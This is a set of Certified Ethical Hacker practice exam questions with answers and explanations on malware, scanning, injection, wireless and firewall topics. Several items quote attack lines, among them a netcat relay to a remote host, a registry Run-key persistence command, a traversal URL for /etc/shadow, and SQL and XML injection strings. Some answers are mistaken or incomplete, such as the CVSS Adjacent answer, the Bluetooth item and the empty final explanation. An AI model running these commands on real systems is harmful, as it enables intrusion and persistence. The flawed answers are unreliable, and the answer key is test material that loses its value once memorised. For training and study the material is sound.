CEH 41-80

Question 1

Christina is conducting a penetration test against Dion Training’s network. The goal of this engagement is to conduct data exfiltration of the company’s exam database without detection. Christina enters the following command into the terminal:

-=-=-=-=-=-=-
C:\database\exams.db>c:\Users\Christina\Desktop\beachpic.png:exams.db
-=-=-=-=-=-=-

Next, Christina emailed the beachpic.png file to her personal email account. Which of the following techniques did she use to exfiltrate the file?

A. NTFS encryption
B. Alternate data streams
C. Unquoted service path
D. DLL hijacking

Answer 1

B. Alternate data streams

OBJ-3.2: An alternate data stream (ADS) is a feature of Microsoft’s NT File System (NTFS) that enables multiple data streams for a single file name by forking one or more files to another. ADS can be abused by hiding one file into another, as shown in this scenario. Once received in her email, she could access the database by opening the file as “beachpic.png:exams.db”.

Question 2

Which command-line tool could you use on a Windows system to enable an inactive administrator account?

A. taskkill

B. robocopy

C. net user

D. gpresult

Answer 2

C. net user

Explanation:

OBJ-3.2: There are several net command utilities that you can use to view and configure shared resources on a Windows network. The net user command allows system administrators to manage user accounts on Windows PCs. You can use the command to display account information or make changes to user accounts. It can be used, among other things, to enable the inactive administrator account of a Windows system.

Question 3

Which type of malware is used to actively attempt to steal confidential information by capturing a user’s data when typed into a web browser or other application?

A. Spyware

B. Keylogger

C. Trojan

D. Rootkit

Answer 3

B. Keylogger

Explanation
OBJ-3.3: A keylogger actively attempts to steal confidential information by capturing the data when entered into the computer by the user. This is done by recording keystrokes entered into a web browser or other application. A software keylogger can be run in the background on a victim’s computer. A hardware keylogger may be placed between the USB port and the wired keyboard.

Question 4

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?

A. A finding that shows the scanner compliance plug-ins are not up-to-date

B. Items classified by the system as Low or as For Informational Purposes Only

C. A scan result showing a version that is different from the automated asset inventory

D. A ‘HTTPS entry that indicates the web page is securely encrypted

Answer 4

B. Items classified by the system as Low or as For Informational Purposes Only
(Correct)

Explanation

OBJ-3.1: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.

Question 5

You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true?

A. The attacker must have physical or logical access to the affected system

B. Exploiting the vulnerability requires the existence of specialized conditions

C. The attacker must have access to the local network that the system is connected to

D. Exploiting the vulnerability does not require any specialized conditions

Answer 5

A. The attacker must have physical or logical access to the affected system

Explanation

OBJ-3.1: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.

Question 6

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v beacon /d C: \Windows\Temp\beacon.bat
-=-=-=-=-=-=-

Which of the following types of persistence is Matt trying to utilize?

A. Services

B. Scheduled task

C. Registry startup

D. PS remoting

Answer 6

C. Registry startup

Explanation

OBJ-3.2: A penetration tester can use the “reg add” command to cause a particular program or command to start every time the Windows machine is booted up. To achieve this, the penetration tester stores the program in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry keys. The first one will cause the program to run whenever any user logs into the machine. The second will only cause the program to start when the victimized user logs in again.

Question 7

A vulnerability scan has returned the following results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares

Category: Windows 
CVE ID: - 
Vendor Ref: - 
Bugtraq ID: - 
Service Modified - 8.30.2017   

Enumeration Results: 
print$ c:\windows\system32\spool\drivers 
files c:\FileShare\Accounting   
Temp c:\temp
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What best describes the meaning of this output?

A. There is an unknown bug in an Apache server with no Bugtraq ID

B. Connecting to the host using a null session allows enumeration of the share names on the host

C. Windows Defender has a known exploit that must be resolved or patched

D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server

Answer 7

B. Connecting to the host using a null session allows enumeration of the share names on the host
Explanation

OBJ-3.1: These results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

Question 8

What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software?

A. XCCDF

B. CPE

C. CCE

D. CVE

Answer 8

D. CVE

Explanation
<
OBJ-3.1: The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

Question 9

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?

A. Conducting a port scan of 192.168.1.142

B. Conducting a brute force login attempt of a remote service on 192.168.1.142

C. Conducting a ping sweep of 192.168.1.142/24

D. Conducting a Denial of Service attack on 192.168.1.142

Answer 9

B. Conducting a brute force login attempt of a remote service on 192.168.1.142

xplanation
OBJ-3.2: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

Question 10

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

A. Cross-site scripting

B. SQL injection

C. Missing patches

D. CRLF injection

Answer 10

C. Missing patches

Explanation
OBJ-3.2: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Question 11

You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability:

You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding?

A. True negative

B. True positive

C. False negative

D. False positive

Answer 11

D. False positive

Explanation
OBJ-3.1: You should categorize the results as a false positive. Based on the scenario and output, your server is not vulnerable to a remote code execution for the identified vulnerability. You are already running MySQL v3.5.3 that is greater than v3.3.x or above. This indicates that the vulnerability scanner falsely identified your MySQL version as an earlier and more vulnerable version. The system incorrectly identified a vulnerability, but the vulnerability doesn’t exist on your system. Therefore this is a false positive.

Question 12

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company’s network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company’s information security team. How would you best classify this threat?

A. Advanced persistent threat (APT)

B. Spear phishing

C. Insider threat

D. Privilege escalation

Answer 12

A. Advanced persistent threat (APT)

Explanation
OBJ-3.3: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. An APT attack intends to steal data rather than to cause damage to the network or organization. An APT refers to an adversary’s ongoing ability to compromise network security, obtain and maintain access, and use various tools and techniques. They are often supported and funded by nation-states or work directly for a nation-states’ government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. While an APT may use spear phishing, privilege escalation, or an insider threat to gain access to the system, the scenario presented in this question doesn’t specify what method was used. Therefore, APT is the best answer to select.

Question 13

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:

-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A. Credential stuffing

B. Session hijacking

C. Password spraying

D. Impersonation

Answer 13

C. Password spraying

Explanation
OBJ-3.2: Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.

Question 14

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?

A. Nmap

B. Nessus

C. Cain and Abel

D. Netcat

Answer 14

C. Cain and Abel

Explanation
OBJ-3.2: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

Question 15

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

A. Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080

B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

C. Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

D. Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76

Answer 15

B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

Explanation
OBJ-3.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

Question 16

You are currently working as a firewall technician. You have received a request to open up a few ports on the firewall to allow a newly VoIP system to operate properly. The installer has requested that the ports associated with SIP, RDP, H.323, and RTP be opened to allow the new system to operate properly. Which of these ports are NOT used by a typical VoIP system?

A. SIP

B. RDP

C. H.323

D. RTP

Answer 16

B. RDP

Explanation
OBJ-4.1: RDP is the protocol for the Remote Desktop Protocol and operates over port 3389. This is not used in a typical VoIP system. SIP (Session Initiation Protocol), H.323 (voice/video conferencing) protocol, and the RTP (Real-time Transport Protocol) are all used heavily in VoIP and video conferencing solutions.

Question 17

A network technician needs to monitor the network to find a user who is browsing websites against the company policy. What should the technician use to view the website and find the user browsing it?

A. SNMP GET

B. Top listener tool

C. Intrusion detection system

D. Packet sniffer

Answer 17

D. Packet sniffer

Explanation
OBJ-4.1: Packet Sniffers can capture and analyze network user traffic. This information can be queried to view website addresses, contents, and sometimes even the password information. This differs from an intrusion detection system in that IDS’ wait to receive implicitly-malicious data in a network before logging the event.

Question 18

A security analyst wants to implement a layered defense posture for this network, so he uses multiple antivirus defensive layers, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?

A. Forensic attack

B. ARP spoofing attack

C. Social engineering attack

D. Scanning attack

Answer 18

C. Social engineering attack

Explanation
OBJ-4.2: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.

Question 19

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?

A. Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389

B. Permit 143.27.43.32 161.212.71.14 RDP 3389

C. Permit 143.27.43.32 161.212.71.0/24 RDP 3389

D. Permit 143.27.43.0/24 161.212.71.14 RDP 3389

Answer 19

B. Permit 143.27.43.32 161.212.71.14 RDP 3389

Explanation

OBJ-4.5: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.

Question 20

A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items’ sale price?

A. SQL injection

B. Changing hidden form values

C. Buffer overflow attack

D. Cross-site scripting

Answer 20

B. Changing hidden form values

Explanation
OBJ-5.2: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

Question 21

You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:

• =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  https: //www.diontraining.com/add_to_cart.php?itemId=5”+perItemPrice=”0.00”+quantity=”100”+/> <. item+id=”5&quantity=0
• =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this line, what type of attack do you expect has been attempted?

A. SQL injection

B. Buffer overflow

C. XML injection

D. Session hijacking

Answer 21

C. XML injection

Explanation
OBJ-5.2: This is an example of an XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter an application’s intended logic. XML Injection can cause the insertion of malicious content into resulting messages/documents. In this case, the URL is attempting to modify the server’s XML structure. The original XML structure would be: . By using the URL above, this would be modified to the following: . The result would be that a new line was added in the XML document that could be processed by the server. This line would allow 10 of the product at $0.00 to be added to the shopping cart, while 0 of the product at $50.00 is added to the cart. This defeats the integrity of the e-commerce store’s add to cart functionality through this XML injection. A SQL injection occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. The real key to answering this question is identifying the XML structured code being entered as part of the URL, shown by the bracketed data.

Question 22

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

A. SQL injection

B. Buffer overflow

C. Directory traversal

D. XML injection

Answer 22

C. Directory traversal

Explanation
OBJ-5.2: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.

Question 23

You are conducting a penetration test against the Dion Training test server. You have just run nikto against the server and received the results below:

-=-=-=-=-=-
root@DionTraining:~# nikto -h test.diontraining.com
- Nikto v2.1.6
—————————————————————————
+ Target IP: 164.201.54.34
+ Target Hostname: test.diontraining.com
+ Target Port: 80
+ Start Time: 2020-12-22 13:43:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2c39 0x53a938fc104ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7596 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-08-22 06:54:44 (GMT8) (1291 seconds)
—————————————————————————
+ 1 host(s) tested
-=-=-=-=-=-

Based on the results above, which of the following exploits should develop for this engagement?

A. Arbitrary code execution

B. SQL injection

C. Clickjacking

D. Privilege escalation

Answer 23

C. Clickjacking

Explanation
OBJ-5.2: The X-Frame-Options in the HTTP response header can be used to indicate whether or not a browser should be allowed to open a page in frame or iframe. If the X-Frame-Options header is not present, then a clickjacking exploit could be used against the web server’s users. The only two vulnerabilities shown in the Nikto results are the clickjacking vulnerability and the MIME Type security issue.

Question 24

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of attack has likely occurred?

A. Session hijacking

B. SQL injection

C. Buffer overflow

D. XML injection

Answer 24

B. SQL injection

Explanation
OBJ-5.3: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

Question 25

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“select ID, GRADE from GRADES where ID=1235235; UPDATE GRADES set GRADE=’A’ where ID=1235235;”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this transaction log, which of the following most likely occurred?

A. The application and the SQL database are functioning properly

B. A student with ID #1235235 used an SQL injection to give themselves straight A’s

C. Someone used an SQL injection to assign straight A’s to the student with ID #1235235

D. The SQL server has insufficient logging and monitoring

Answer 25

C. Someone used an SQL injection to assign straight A’s to the student with ID #1235235

Explanation
OBJ-5.3: Based on this transaction log entry, it appears that the ID# field was not properly validated before being passed to the SQL server. This would allow someone to conduct an SQL injection and retrieve the student’s grades and set all of this student’s grades to an ‘A’ at the same time. It is common to look for a ‘1==1’ type condition to identify an SQL injection. There are other methods to conduct an SQL injection attack that could be utilized by an attacker. If input validation is not being performed on user-entered data, an attacker can exploit any SQL language aspect and inject SQL-specific commands. This entry is suspicious and indicates that either the application or the SQL database is not functioning properly. Still, there appears to be adequate logging and monitoring based on what we can see and whether the question never indicates logging was an issue. An SQL database would not be designed to set ALL of a particular student’s grades to A’s, thus making this single entry suspicious. Most SQL statements in an SQL log will be fairly uniform and repetitive by nature when you review them. This leaves us with the question as to who person this SQL injection. Per the question choices, it could be the student with ID# 1235235 or “someone.” While it seems as if student #1235235 had the most to gain from this, without further investigation, we cannot prove that it actually was student #1235235 that performed the SQL injection. Undoubtedly, student #125235 should be a person of interest in any ensuing investigations, but additional information (i.e., whose credentials were being used, etc.) should be used before making any accusations. Therefore, the answer is that “someone” performed this SQL injection.

Question 26

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true?

A. The server assumes you are conducting a DDoS attack

B. You are scanning a CDN-hosted copy of the site

C. The scan will not produce any useful information

D. Nothing can be determined about this site with the information provided

Answer 26

B. You are scanning a CDN-hosted copy of the site

Explanation
OBJ-5.1: This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server’s cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.

Question 27

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?

A. Issue the pivot exploit and setup meterpreter

B. Reconfigure the network settings in meterpreter

C. Set the payload to propagate through meterpreter

D. Create a route statement in meterpreter

Answer 27

D. Create a route statement in meterpreter

Explanation

OBJ-5.1: Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

Question 28

What control provides the best protection against both SQL injection and cross-site scripting attacks?

A. Hypervisors

B. Network layer firewalls

C. CSRF

D. Input validation

Answer 28

D. Input validation

Explanation

OBJ-5.3: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

Question 29

What common technique is used by malicious individuals to perform a man-in-the-middle attack on a wireless network?

A. ARP cache poisoning

B. Amplified DNS attacks

C. Session hijacking

D. Creating an evil twin

Answer 29

D. Creating an evil twin

Explanation:

OBJ-6.1: Evil Twin access points are the most common way to perform a man-in-the-middle attack on a wireless network. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.

Question 30

You are working as part of a penetration testing team targeting Dion Training’s wireless network. Which of the following tools should you use to gather information about their wireless network?

A. Whois

B. Burp suite

C. BeEF

D. Kismet

Answer 30

D. Kismet

Explanation

OBJ-6.1: Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. It can monitor wireless activity, identify device types, and capture raw packets for later password cracking. Whois is a protocol that queries databases that store registered users or assignees of an Internet resource, such as a domain name. YASCA (Yet Another Source Code Analyzer) is an open-source SAST program that inspects source code for security vulnerabilities, code quality, and performance. Burp Suite is an integrated platform included for testing web applications’ security by acting as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers and can be used for XSS and injection attacks against a website.

Question 31

What is the term for exploiting a weakness in a user’s wireless headset to compromise their smartphone?

A. Multiplexing

B. Zero-day attack

C. Smurfing

D. Bluejacking

Answer 31

D. Bluejacking

Explanation
OBJ-6.1: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers.

Question 32

Which of the following weaknesses exist in WPS enabled wireless networks?

A. Utilizes TKIP to secure the authentication handshake

B. Utilizes a 24-bit initialization vector

C. Brute force occurs within 11,000 combinations

D. Utilizes a 40-bit encryption key

Answer 32

C. Brute force occurs within 11,000 combinations

Explanation
OBJ-6.1: The most prominent attack against WPS enabled wireless networks involves brute-forcing the 8-digit PIN that client uses to enroll their devices without knowing the pre-shared key. WPS checks each half of the PIN individually, reducing the number of possible combinations from a maximum of 100,000,000 to only 11,000. This only takes a few minutes to crack on most modern computers, as long as the WAP doesn’t have a lockout after a certain number of failures. The lockout mechanism may also be triggered based on the client’s MAC, so you can often spoof MAC to bypass this defense.

Question 33

A cybersecurity analyst notices that an attacker is trying to crack the WPS pin associated with a wireless printer. The device logs show that the attacker tried 00000000, 00000001, 00000002 and continued to increment by 1 number each time until they found the correct PIN of 13252342. Which of the following type of password cracking was being performed by the attacker?

A. Rainbow table

B. Dictionary

C. Hybrid

D. Brute-force

Answer 33

D. Brute-force

Explanation
OBJ-6.1: Brute-force attack when an attacker uses a set of predefined values to attack a target and analyze the response until he succeeds. Success depends on the set of predefined values. It will take more time if it is larger, but there is a better probability of success. In a traditional brute-force attack, the passcode or password is incrementally increased by one letter/number each time until the right passcode/password is found.

Question 34

You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal?

A. VPN

B. VLAN

C. WPA2

D. MAC filtering

Answer 34

B. VLAN
(Correct)

Explanation
OBJ-6.1: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevent communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual network’s data. A virtual private network (VPN) is a remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

Question 35

What tool is used to collect wireless packet data?

A. Aircrack-ng

B, John the Ripper

C. Nessus

D. Netcat

Answer 35

A. Aircrack-ng

Explanation
OBJ-6.1: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

Question 36

Which of the following is the LEAST secure wireless security and encryption protocol?

A. AES

B. WPA

C. WPA2

D. WEP

Answer 36

D. WEP
(Correct)

Explanation

